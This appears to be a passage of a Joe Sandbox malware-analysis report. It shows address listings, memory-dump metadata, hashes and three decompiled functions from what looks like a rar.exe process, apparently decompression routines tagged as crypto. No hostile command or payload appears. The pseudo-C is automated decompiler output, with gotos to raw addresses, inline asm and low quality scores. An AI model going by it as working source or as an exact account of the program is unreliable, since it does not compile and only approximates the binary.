                                                                                                            0x7ff650b62004
                                                                                                            0x7ff650b62008
                                                                                                            0x7ff650b6200b
                                                                                                            0x7ff650b6200f
                                                                                                            0x7ff650b62012
                                                                                                            0x7ff650b62016
                                                                                                            0x7ff650b6201a
                                                                                                            0x7ff650b62029
                                                                                                            0x7ff650b6202b
                                                                                                            0x7ff650b6202e
                                                                                                            0x7ff650b62032
                                                                                                            0x7ff650b6203f
                                                                                                            0x7ff650b62042
                                                                                                            0x7ff650b6204b
                                                                                                            0x7ff650b6204e
                                                                                                            0x7ff650b62054
                                                                                                            0x7ff650b62057
                                                                                                            0x7ff650b6205f
                                                                                                            0x7ff650b62066
                                                                                                            0x7ff650b6206b
                                                                                                            0x7ff650b6206d
                                                                                                            0x7ff650b62070
                                                                                                            0x7ff650b62074
                                                                                                            0x7ff650b62081
                                                                                                            0x7ff650b62084
                                                                                                            0x7ff650b6208d
                                                                                                            0x7ff650b62095
                                                                                                            0x7ff650b62098
                                                                                                            0x7ff650b6209c
                                                                                                            0x7ff650b620ab
                                                                                                            0x7ff650b620ae
                                                                                                            0x7ff650b620b5
                                                                                                            0x7ff650b620b9
                                                                                                            0x7ff650b620c5
                                                                                                            0x7ff650b620d4
                                                                                                            0x7ff650b620e1
                                                                                                            0x7ff650b620e6
                                                                                                            0x7ff650b620ed
                                                                                                            0x7ff650b620ef
                                                                                                            0x7ff650b620f4
                                                                                                            0x7ff650b620f6
                                                                                                            0x7ff650b620fa
                                                                                                            0x7ff650b620fe
                                                                                                            0x7ff650b62103
                                                                                                            0x7ff650b6210c
                                                                                                            0x7ff650b6210f
                                                                                                            0x7ff650b62118
                                                                                                            0x7ff650b62123
                                                                                                            0x7ff650b62126
                                                                                                            0x7ff650b6212c
                                                                                                            0x7ff650b62133
                                                                                                            0x7ff650b6213b
                                                                                                            0x7ff650b62141
                                                                                                            0x7ff650b62148
                                                                                                            0x7ff650b6214a
                                                                                                            0x7ff650b62156
                                                                                                            0x7ff650b6215b
                                                                                                            0x7ff650b62163
                                                                                                            0x7ff650b62184

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 166a697ad75f45b120d55b5b80406cec76f11ed15a81784579b27f0a2b3f9ff5
                                                                                                            • Instruction ID: 78015e626b8e46da1036943251ee6c049ccf3cbd12dcf6a7eb1e5a52f6fdc007
                                                                                                            • Opcode Fuzzy Hash: 166a697ad75f45b120d55b5b80406cec76f11ed15a81784579b27f0a2b3f9ff5
                                                                                                            • Instruction Fuzzy Hash: CF516BF37185E157E7248F24D480E3CBBA1E382B45B199235DE9A97B44CE3BC452CB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B605A8 Relevance: .1, Instructions: 140COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 86%
                                                                                                            			E00007FF67FF650B605A8(long long __rbx, void* __rdx, unsigned int* __r8, long long _a8) {
				signed int _v56;
				char _v116;
				signed int _v120;
				void* _t56;
				unsigned int _t91;
				unsigned int _t94;
				unsigned int _t98;
				void* _t99;
				signed long long _t107;
				signed long long _t108;
				signed int* _t112;
				signed long long _t114;
				signed int* _t118;
				void* _t123;
				signed long long _t124;
				signed int* _t128;
				signed int* _t129;
				void* _t135;
				void* _t137;

				_t117 = __rdx;
				_a8 = __rbx;
				_t124 = _t123 - 0x70;
				_t107 =  *0x50b978f0; // 0x27db226282f1
				_t108 = _t107 ^ _t124;
				_v56 = _t108;
				_t94 = r9d;
				 *__r8 = _t94;
				_t112 =  &_v120;
				_t4 = _t117 + 0x40; // 0x40
				r8d = _t4;
				E00007FF67FF650B6C1A0(_t56, 0, _t112, __rdx, __r8);
				r8d = _t94;
				_t5 = _t112 + 1; // 0x1
				r15d = _t5;
				if (_t94 == 0) goto 0x50b60604;
				 *((intOrPtr*)(_t124 + 0x20 + _t108 * 4)) =  *((intOrPtr*)(_t124 + 0x20 + _t108 * 4)) + r15d;
				if (_t112 + _t137 - __r8 < 0) goto 0x50b605f0;
				_v120 = _v120 & 0x00000000;
				_t114 =  &(__r8[0x322]);
				E00007FF67FF650B6C1A0( *(__rdx + _t112) & 0xf, 0, _t114, __rdx, __r8 + __r8);
				__r8[1] = __r8[1] & 0x00000000;
				_t118 =  &(__r8[0x11]);
				 *_t118 =  *_t118 & 0x00000000;
				_t135 =  &_v116 - __r8;
				r9d = 0;
				r14d = 0;
				_t128 = _t118;
				r9d = r9d +  *((intOrPtr*)(_t135 + _t128 - 0x44));
				r14d = r14d +  *((intOrPtr*)( &_v120 - __r8 + _t128 - 0x44));
				_t129 =  &(_t128[1]);
				 *_t129 = r14d;
				r9d = r9d + r9d;
				 *(_t129 - 0x40) = r9d << 0x10 - bpl;
				if (_t137 + _t137 - 0x10 < 0) goto 0x50b60641;
				asm("movups xmm0, [edx]");
				asm("movups xmm1, [edx+0x10]");
				asm("movaps [esp+0x20], xmm0");
				asm("movups xmm0, [edx+0x20]");
				asm("movaps [esp+0x30], xmm1");
				asm("movups xmm1, [edx+0x30]");
				asm("movaps [esp+0x40], xmm0");
				asm("movaps [esp+0x50], xmm1");
				_t98 = _t94;
				if (_t98 == 0) goto 0x50b606bd;
				if (_t98 == 0) goto 0x50b606b3;
				 *((short*)(__r8 + 0xc88 + _t108 * 2)) = 0;
				 *((intOrPtr*)(_t124 + 0x20 + _t114 * 4)) =  *((intOrPtr*)(_t124 + 0x20 + _t114 * 4)) + 1;
				_t99 = 0 + r15d - _t94;
				if (_t99 < 0) goto 0x50b60698;
				if (_t99 == 0) goto 0x50b606d4;
				if (_t99 == 0) goto 0x50b606d4;
				if (_t94 - 0x12a - r15d != 7) goto 0x50b606d9;
				__r8[0x21] = 0xa;
				r9d = 0;
				r11d = 0;
				r8d = r9d;
				r8d = r8d << 0x10 - __r8[0x21];
				goto 0x50b60713;
				if (r8d -  *((intOrPtr*)(__r8 + 4 + _t108 * 4)) < 0) goto 0x50b60718;
				_t91 = r15d + r15d;
				if (_t91 - 0x10 < 0) goto 0x50b60707;
				__r8[0x22] = _t91;
				if (_t91 - 0x10 >= 0) goto 0x50b60749;
				r8d = r8d -  *((intOrPtr*)(__r8 + 4 + _t108 * 4));
				r8d = r8d >> 0x10 - _t91;
				r8d = r8d +  *((intOrPtr*)(__r8 + 0x44 + _t108 * 4));
				if (r8d - _t94 >= 0) goto 0x50b60749;
				goto 0x50b6074b;
				 *((short*)(_t135 +  &(__r8[0x122]))) = 0;
				r9d = r9d + r15d;
				if (r9d - r15d << 0xa < 0) goto 0x50b606f4;
				return E00007FF67FF650B69D10(_t91, 0, _v56 ^ _t124);
			}






















                                                                                                            0x7ff650b605a8
                                                                                                            0x7ff650b605a8
                                                                                                            0x7ff650b605b4
                                                                                                            0x7ff650b605b8
                                                                                                            0x7ff650b605bf
                                                                                                            0x7ff650b605c2
                                                                                                            0x7ff650b605ca
                                                                                                            0x7ff650b605cf
                                                                                                            0x7ff650b605d5
                                                                                                            0x7ff650b605da
                                                                                                            0x7ff650b605da
                                                                                                            0x7ff650b605de
                                                                                                            0x7ff650b605e5
                                                                                                            0x7ff650b605e8
                                                                                                            0x7ff650b605e8
                                                                                                            0x7ff650b605ee
                                                                                                            0x7ff650b605fa
                                                                                                            0x7ff650b60602
                                                                                                            0x7ff650b60604
                                                                                                            0x7ff650b60609
                                                                                                            0x7ff650b60615
                                                                                                            0x7ff650b6061a
                                                                                                            0x7ff650b6061e
                                                                                                            0x7ff650b60622
                                                                                                            0x7ff650b60632
                                                                                                            0x7ff650b60635
                                                                                                            0x7ff650b60638
                                                                                                            0x7ff650b6063e
                                                                                                            0x7ff650b60641
                                                                                                            0x7ff650b6064b
                                                                                                            0x7ff650b60650
                                                                                                            0x7ff650b60657
                                                                                                            0x7ff650b60662
                                                                                                            0x7ff650b60665
                                                                                                            0x7ff650b6066d
                                                                                                            0x7ff650b6066f
                                                                                                            0x7ff650b60672
                                                                                                            0x7ff650b60676
                                                                                                            0x7ff650b6067b
                                                                                                            0x7ff650b6067f
                                                                                                            0x7ff650b60684
                                                                                                            0x7ff650b6068a
                                                                                                            0x7ff650b6068f
                                                                                                            0x7ff650b60694
                                                                                                            0x7ff650b60696
                                                                                                            0x7ff650b6069c
                                                                                                            0x7ff650b606a5
                                                                                                            0x7ff650b606af
                                                                                                            0x7ff650b606b9
                                                                                                            0x7ff650b606bb
                                                                                                            0x7ff650b606c4
                                                                                                            0x7ff650b606c9
                                                                                                            0x7ff650b606d2
                                                                                                            0x7ff650b606dc
                                                                                                            0x7ff650b606eb
                                                                                                            0x7ff650b606f1
                                                                                                            0x7ff650b606f9
                                                                                                            0x7ff650b60702
                                                                                                            0x7ff650b60705
                                                                                                            0x7ff650b6070e
                                                                                                            0x7ff650b60710
                                                                                                            0x7ff650b60716
                                                                                                            0x7ff650b60718
                                                                                                            0x7ff650b6071e
                                                                                                            0x7ff650b60728
                                                                                                            0x7ff650b6072f
                                                                                                            0x7ff650b60734
                                                                                                            0x7ff650b6073c
                                                                                                            0x7ff650b60747
                                                                                                            0x7ff650b6074b
                                                                                                            0x7ff650b60754
                                                                                                            0x7ff650b60761
                                                                                                            0x7ff650b60783

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 014b961c89c1b0bb069384bdf8fe89650a8ca24c98fdd3e251118ead9fa26a90
                                                                                                            • Instruction ID: c94c73563c57b49ed9cc3f414de4a24f55b375980a26e3cbb5a5fbb1dbb85049
                                                                                                            • Opcode Fuzzy Hash: 014b961c89c1b0bb069384bdf8fe89650a8ca24c98fdd3e251118ead9fa26a90
                                                                                                            • Instruction Fuzzy Hash: 115144B3A2818297E3148F29D1446BD33A0FB94B48F084630DB4A97B85DE3EE995CB00
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B47D78 Relevance: .1, Instructions: 138COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 33%
                                                                                                            			E00007FF67FF650B47D78(void* __ebx, signed int __ecx, void* __ebp, long long __rbx, intOrPtr* __rcx, void* __rdx, long long __rsi, long long __rbp, void* __r10, void* __r11, char _a8, long long _a16, long long _a24, long long _a32) {
				void* _v8;
				char _v72;
				long long _v88;
				long long _v96;
				intOrPtr _v104;
				long long _v112;
				long long _v120;
				void* __rdi;
				void* _t69;
				void* _t81;
				intOrPtr _t93;
				intOrPtr* _t103;
				intOrPtr _t106;
				intOrPtr _t111;
				void* _t124;
				char* _t125;
				char* _t129;
				intOrPtr _t131;
				long long _t134;
				intOrPtr _t135;
				intOrPtr _t136;
				long long _t138;
				intOrPtr _t142;
				intOrPtr _t152;

				_t138 = __rsi;
				_t124 = __rdx;
				_t81 = __ebp;
				_t70 = __ecx;
				_t69 = __ebx;
				_a16 = __rbx;
				_a24 = __rbp;
				_a32 = __rsi;
				_t103 = __rcx;
				_t106 =  *__rcx;
				if (_t106 == 0) goto 0x50b47fab;
				if ( *((intOrPtr*)(_t106 + 0x7f78)) != 3) goto 0x50b47fab;
				_t5 = _t124 + 2; // 0x2
				r8d = _t5;
				 *0x50b80550();
				_t93 =  *((intOrPtr*)( *((intOrPtr*)( *__rcx)) + 0x28));
				 *0x50b80550();
				_t142 = _t93;
				E00007FF67FF650B48E10(_t93,  &_v72);
				_t131 =  *((intOrPtr*)(__rcx + 0x10));
				if (_t131 == 0) goto 0x50b47fa1;
				_t152 = _t142;
				_t125 =  &_v72;
				E00007FF67FF650B477F0(__rcx, _t125, __rsi, _t142, _t131, _t152);
				r9d = 0;
				_t11 = _t152 + 3; // 0x3
				r8d = _t11;
				E00007FF67FF650B49174(__ecx, 0, _t103,  &_v72, _t125, _t131, _t138, _t142, _t152);
				_t139 = _t138 + _t93;
				if ( *((intOrPtr*)(_t131 + 0x18)) != 0) goto 0x50b47deb;
				if (_t138 + _t93 == 0) goto 0x50b47fa1;
				_t111 =  *_t103;
				_t134 = _t142 - _t125 + _t93 +  *((intOrPtr*)(_t111 + 0x7f88));
				if (_t134 -  *((intOrPtr*)(_t111 + 0x34c8)) > 0) goto 0x50b47fa1;
				r8d = 0;
				 *0x50b80550();
				 *((long long*)( *_t103 + 0x34c0)) = _t134;
				_v120 = 0;
				r9d = 0;
				r8d = 0;
				_t21 = _t152 + 1; // 0x1
				E00007FF67FF650B1B4D8(_t21,  *_t103,  *_t103, _t125 + _t93 +  *((intOrPtr*)(_t111 + 0x7f88)), _t131, __r10, __r11);
				r8d = 0;
				 *0x50b80550();
				E00007FF67FF650B36990(_t103,  *_t103 + 0x5880, _t142, _t138 + _t93, _t131);
				 *((char*)( *_t103 + 0x5890)) = 1;
				E00007FF67FF650B36770(0,  *_t103 + 0x6900, _t142);
				_v112 = 8;
				_v120 = 0x50b847f0;
				r9d = 0;
				0x50b17ac4();
				_t135 =  *_t103;
				if ( *((char*)(_t135 + 0x692b)) == 0) goto 0x50b47f4e;
				_v88 = _t135 + 0x6952;
				_v96 = _t135 + 0x695b;
				_v104 =  *((intOrPtr*)(_t135 + 0x697c));
				_v112 = _t135 + 0x6941;
				_v120 = _t135 + 0x6931;
				r8d = 5;
				E00007FF67FF650B28FF0(1, _t103, _t103 + 0x30,  *((intOrPtr*)(_t135 + 0x22d8)) + 0x6030);
				_t136 =  *((intOrPtr*)(_t103 + 0x10));
				goto 0x50b47f93;
				_t129 =  &_v72;
				E00007FF67FF650B477F0(_t103, _t129, _t138 + _t93, _t142, _t136, _t142);
				_t42 = _t129 + 3; // 0x3
				r8d = _t42;
				E00007FF67FF650B49174(_t70, 0, _t103,  &_v72, _t129, _t136, _t138 + _t93, _t142,  &_a8);
				E00007FF67FF650B47FC4(_t135 + 0x6952, _t103, _t103, _a8, _t139, _t142, _t135 + 0x6952);
				if ( *((intOrPtr*)(_t136 + 0x18)) != 0) goto 0x50b47f54;
				E00007FF67FF650B47508(_t69, _t70, 0, _t81, _t103, _t103);
				return E00007FF67FF650B11534( &_v72);
			}



























                                                                                                            0x7ff650b47d78
                                                                                                            0x7ff650b47d78
                                                                                                            0x7ff650b47d78
                                                                                                            0x7ff650b47d78
                                                                                                            0x7ff650b47d78
                                                                                                            0x7ff650b47d78
                                                                                                            0x7ff650b47d7d
                                                                                                            0x7ff650b47d82
                                                                                                            0x7ff650b47d8f
                                                                                                            0x7ff650b47d92
                                                                                                            0x7ff650b47d98
                                                                                                            0x7ff650b47da5
                                                                                                            0x7ff650b47db0
                                                                                                            0x7ff650b47db0
                                                                                                            0x7ff650b47db8
                                                                                                            0x7ff650b47dc4
                                                                                                            0x7ff650b47dc8
                                                                                                            0x7ff650b47dce
                                                                                                            0x7ff650b47dd6
                                                                                                            0x7ff650b47dde
                                                                                                            0x7ff650b47de5
                                                                                                            0x7ff650b47deb
                                                                                                            0x7ff650b47df1
                                                                                                            0x7ff650b47df9
                                                                                                            0x7ff650b47dfe
                                                                                                            0x7ff650b47e03
                                                                                                            0x7ff650b47e03
                                                                                                            0x7ff650b47e0c
                                                                                                            0x7ff650b47e11
                                                                                                            0x7ff650b47e1b
                                                                                                            0x7ff650b47e20
                                                                                                            0x7ff650b47e26
                                                                                                            0x7ff650b47e42
                                                                                                            0x7ff650b47e4c
                                                                                                            0x7ff650b47e55
                                                                                                            0x7ff650b47e5c
                                                                                                            0x7ff650b47e65
                                                                                                            0x7ff650b47e6c
                                                                                                            0x7ff650b47e71
                                                                                                            0x7ff650b47e74
                                                                                                            0x7ff650b47e77
                                                                                                            0x7ff650b47e7e
                                                                                                            0x7ff650b47e89
                                                                                                            0x7ff650b47e93
                                                                                                            0x7ff650b47ea5
                                                                                                            0x7ff650b47ead
                                                                                                            0x7ff650b47ec0
                                                                                                            0x7ff650b47ec5
                                                                                                            0x7ff650b47ed4
                                                                                                            0x7ff650b47ed9
                                                                                                            0x7ff650b47ee4
                                                                                                            0x7ff650b47ee9
                                                                                                            0x7ff650b47ef3
                                                                                                            0x7ff650b47f23
                                                                                                            0x7ff650b47f28
                                                                                                            0x7ff650b47f33
                                                                                                            0x7ff650b47f37
                                                                                                            0x7ff650b47f3c
                                                                                                            0x7ff650b47f41
                                                                                                            0x7ff650b47f49
                                                                                                            0x7ff650b47f4e
                                                                                                            0x7ff650b47f52
                                                                                                            0x7ff650b47f5a
                                                                                                            0x7ff650b47f5f
                                                                                                            0x7ff650b47f6e
                                                                                                            0x7ff650b47f6e
                                                                                                            0x7ff650b47f77
                                                                                                            0x7ff650b47f8a
                                                                                                            0x7ff650b47f99
                                                                                                            0x7ff650b47f9b
                                                                                                            0x7ff650b47fc3

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 6f66a80ffb6c43789e4fda227f46e224f849d850c428d09f466bbdf51402d6ab
                                                                                                            • Instruction ID: 3d1e9bb574e88a7e3bec3ae620386723451b430033aaff613017cba9efe66327
                                                                                                            • Opcode Fuzzy Hash: 6f66a80ffb6c43789e4fda227f46e224f849d850c428d09f466bbdf51402d6ab
                                                                                                            • Instruction Fuzzy Hash: 82518236714A86A6D714CB25D5807AD7362FB89F84F484132DE8E93B59CF3AE515C700
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B39EF8 Relevance: .1, Instructions: 136COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 94%
                                                                                                            			E00007FF67FF650B39EF8(signed int __edx, long long __rbx, void* __rdx, long long __rsi, long long __rbp, long long __r8, signed int _a40) {
				void* _v40;
				signed int _v56;
				char _v312;
				char _v696;
				long long _v712;
				signed long long _v720;
				signed int _v724;
				signed int _v728;
				signed int _t48;
				void* _t49;
				void* _t50;
				intOrPtr _t59;
				signed int _t63;
				signed long long _t70;
				signed int _t73;
				void* _t76;
				signed int _t85;
				signed int _t88;
				void* _t98;
				signed long long _t106;
				signed long long _t108;
				char* _t113;
				void* _t127;
				signed long long _t128;
				intOrPtr* _t132;
				void* _t136;
				char* _t137;
				void* _t146;

				_t136 = _t127;
				 *((long long*)(_t136 + 8)) = __rbx;
				 *((long long*)(_t136 + 0x10)) = __rbp;
				 *((long long*)(_t136 + 0x20)) = __rsi;
				_t128 = _t127 - 0x2d0;
				_t106 =  *0x50b978f0; // 0x27db226282f1
				_v56 = _t106 ^ _t128;
				_v728 = r9d;
				asm("cdq");
				_v712 = __r8;
				_t48 = (__edx << 8) / r9d;
				_v724 = _t48;
				r14d = _t48;
				if (_t48 - 0xfa > 0) goto 0x50b3a0a9;
				r8d = 0x100;
				_t49 = E00007FF67FF650B6C1A0(_t48, 0, _t136 - 0x238, __rdx, __r8);
				r8d = 0x100;
				_t50 = E00007FF67FF650B6C1A0(_t49, 0,  &_v312, __rdx, __r8);
				_t70 = _a40;
				_t113 =  &_v696;
				_t108 = _t70;
				_v720 = _t108;
				E00007FF67FF650B6C1A0(_t50, 0, _t113, __rdx, _t108 * 4);
				if (_t70 <= 0) goto 0x50b3a072;
				_t132 =  &_v696;
				_t146 = r9d - _t70;
				r12d = _t70;
				_t137 = _t113;
				if (_t113 - _t146 >= 0) goto 0x50b3a02c;
				r15d =  *_t132;
				r9b = 0;
				_t85 =  *(_t137 + _v712) & 0x000000ff;
				if ( *((char*)(_t128 + __rdx + 0xc0)) != 0) goto 0x50b39fec;
				 *((char*)(_t128 + __rdx + 0xc0)) = 1;
				r9b = r9b - _t85;
				r9b = r9b;
				r13d = r9b;
				if ( *((char*)(_t128 + _t108 + 0x1c0)) != 0) goto 0x50b3a00e;
				 *((char*)(_t128 + _t108 + 0x1c0)) = 1;
				r9b = _t85;
				r9b = r9b;
				asm("cdq");
				r15d = r15d + (r13d ^ _t85) - _t85;
				_t98 = _t137 + _v720 - _t146;
				if (_t98 < 0) goto 0x50b39fd3;
				 *_t132 = r15d;
				if (_t98 != 0) goto 0x50b39fc3;
				_t73 = _a40;
				_t88 = _v728;
				r10d = _t73;
				r14d = _v724;
				if (1 - __rsi + __rsi > 0) goto 0x50b3a0a9;
				_t59 = _v696;
				_t60 =  >=  ? 0x10000000 : _t59;
				_t76 =  >=  ? 0x10000000 : _t59;
				if (_t59 != 0x10000000) goto 0x50b3a05d;
				goto 0x50b3a077;
				asm("cdq");
				_t63 = 0x10000000 / _t88 * _t73;
				if (_t88 - 0x400 >= 0) goto 0x50b3a091;
				if (_t63 - 0xa00 > 0) goto 0x50b3a0a9;
				if (_t63 - 0x1400 > 0) goto 0x50b3a0a9;
				goto 0x50b3a0ab;
				return E00007FF67FF650B69D10(0, 0x10000000 << 8, _v56 ^ _t128);
			}































                                                                                                            0x7ff650b39ef8
                                                                                                            0x7ff650b39efb
                                                                                                            0x7ff650b39eff
                                                                                                            0x7ff650b39f03
                                                                                                            0x7ff650b39f10
                                                                                                            0x7ff650b39f17
                                                                                                            0x7ff650b39f21
                                                                                                            0x7ff650b39f31
                                                                                                            0x7ff650b39f36
                                                                                                            0x7ff650b39f37
                                                                                                            0x7ff650b39f3c
                                                                                                            0x7ff650b39f3f
                                                                                                            0x7ff650b39f43
                                                                                                            0x7ff650b39f4b
                                                                                                            0x7ff650b39f5d
                                                                                                            0x7ff650b39f66
                                                                                                            0x7ff650b39f6b
                                                                                                            0x7ff650b39f78
                                                                                                            0x7ff650b39f7d
                                                                                                            0x7ff650b39f84
                                                                                                            0x7ff650b39f89
                                                                                                            0x7ff650b39f8e
                                                                                                            0x7ff650b39f9b
                                                                                                            0x7ff650b39fa2
                                                                                                            0x7ff650b39fad
                                                                                                            0x7ff650b39fbd
                                                                                                            0x7ff650b39fc0
                                                                                                            0x7ff650b39fc5
                                                                                                            0x7ff650b39fcb
                                                                                                            0x7ff650b39fcd
                                                                                                            0x7ff650b39fd0
                                                                                                            0x7ff650b39fd3
                                                                                                            0x7ff650b39fe0
                                                                                                            0x7ff650b39fe2
                                                                                                            0x7ff650b39fec
                                                                                                            0x7ff650b39fef
                                                                                                            0x7ff650b39ff2
                                                                                                            0x7ff650b3a002
                                                                                                            0x7ff650b3a004
                                                                                                            0x7ff650b3a00e
                                                                                                            0x7ff650b3a014
                                                                                                            0x7ff650b3a01c
                                                                                                            0x7ff650b3a021
                                                                                                            0x7ff650b3a024
                                                                                                            0x7ff650b3a027
                                                                                                            0x7ff650b3a029
                                                                                                            0x7ff650b3a037
                                                                                                            0x7ff650b3a039
                                                                                                            0x7ff650b3a043
                                                                                                            0x7ff650b3a047
                                                                                                            0x7ff650b3a04a
                                                                                                            0x7ff650b3a051
                                                                                                            0x7ff650b3a05d
                                                                                                            0x7ff650b3a065
                                                                                                            0x7ff650b3a068
                                                                                                            0x7ff650b3a06e
                                                                                                            0x7ff650b3a070
                                                                                                            0x7ff650b3a07c
                                                                                                            0x7ff650b3a07f
                                                                                                            0x7ff650b3a088
                                                                                                            0x7ff650b3a08f
                                                                                                            0x7ff650b3a096
                                                                                                            0x7ff650b3a0a7
                                                                                                            0x7ff650b3a0db

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a279e5db772684db8e9c137cc07a63c43c63b347827c724a428990ba699ee2d0
                                                                                                            • Instruction ID: ed62fe3b25849904703d62d9d99f2657c9255f9ce41f0fe4f39b00cf116c390d
                                                                                                            • Opcode Fuzzy Hash: a279e5db772684db8e9c137cc07a63c43c63b347827c724a428990ba699ee2d0
                                                                                                            • Instruction Fuzzy Hash: 0551277271868296E724CF26A4847ED7795F78E384F684136DA8ED3B45CE3EE845CB00
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

